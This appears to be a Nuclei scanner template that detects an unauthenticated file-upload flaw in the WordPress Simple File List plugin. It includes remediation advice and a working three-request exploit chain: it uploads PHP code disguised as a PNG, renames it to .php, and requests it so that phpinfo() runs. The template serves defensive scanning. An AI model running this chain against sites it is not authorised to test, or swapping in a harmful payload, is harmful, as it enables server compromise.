id: wordpress-rce-simplefilelist
info:
  name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE
  author:
  - l0ne1y
  description: |-
    Unauthorized issue with WordPress Plugin SimpleFilelist leads to arbitrary file upload vulnerability
    WordPress and WordPress plugin are both products of the WordPress Foundation. WordPress is a blogging platform developed using PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. WordPress plugin is an application plugin.
    There is a security vulnerability in WordPress plugin The Simple File List 3.2.7 and previous versions. The vulnerability is caused by a lack of authentication in ~/wp-content/plugins/simple-file-list/ee-upload-engine.php. An attacker can exploit this vulnerability to upload arbitrary files.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.com/plugins

    Temporary fix:
    1. The front and back ends verify user input information at the same time, a double verification mechanism.
    2. Before calling the function, verify whether the user has the permission to call the relevant function.
    3. The encrypted resource ID referenced by the direct object prevents attackers from enumerating IDs and specializes in handling sensitive data.
    4. Use a mature permission management framework, such as spring security.
    5. The user's credentials for access operations (such as user ID, product number, order serial number, etc.) are preferably obtained by associating the session on the server side or encrypting it and placing it in the session.
    6. When a form or other parameters must be used to submit the user's credentials for access operations (such as user ID, product number, order serial number, etc.), a construction method that is difficult to guess (adding letters and random numbers, etc.) should be used as much as possible or a complex encryption algorithm should be used to encrypt and submit. The credentials and session permissions submitted by the client should be strictly verified, such as whether the submitted product number is a product number belonging to the logged-in user.
    7. Conduct strict permission verification on the management function modules. If not necessary, it is recommended not to open the Internet or perform access control at the network layer.
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - '{{randstr}}'
    - PHP Version
    - Configuration Command
  - type: word
    part: header
    words:
    - text/html
  - type: status
    status:
    - 200
  matchers-condition: and
  raw:
  - |
    POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1
    Host: {{Hostname}}
    Accept: */*
    Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2

    --6985fa39c0698d07f6d418b37388e1b2
    Content-Disposition: form-data; name="eeSFL_ID"

    1
    --6985fa39c0698d07f6d418b37388e1b2
    Content-Disposition: form-data; name="eeSFL_FileUploadDir"

    /wp-content/uploads/simple-file-list/
    --6985fa39c0698d07f6d418b37388e1b2
    Content-Disposition: form-data; name="eeSFL_Timestamp"

    1587258885
    --6985fa39c0698d07f6d418b37388e1b2
    Content-Disposition: form-data; name="eeSFL_Token"

    ba288252629a5399759b6fde1e205bc2
    --6985fa39c0698d07f6d418b37388e1b2
    Content-Disposition: form-data; name="file"; filename="nuclei.png"
    Content-Type: image/png

    <?php echo {{randstr}}; phpinfo(); ?>
    --6985fa39c0698d07f6d418b37388e1b2--
  - |
    POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1
    Host: {{Hostname}}
    X-Requested-With: XMLHttpRequest
    Accept: */*
    Content-Type: application/x-www-form-urlencoded

    eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php
  - |
    GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1
    Host: {{Hostname}}
    Accept: */*
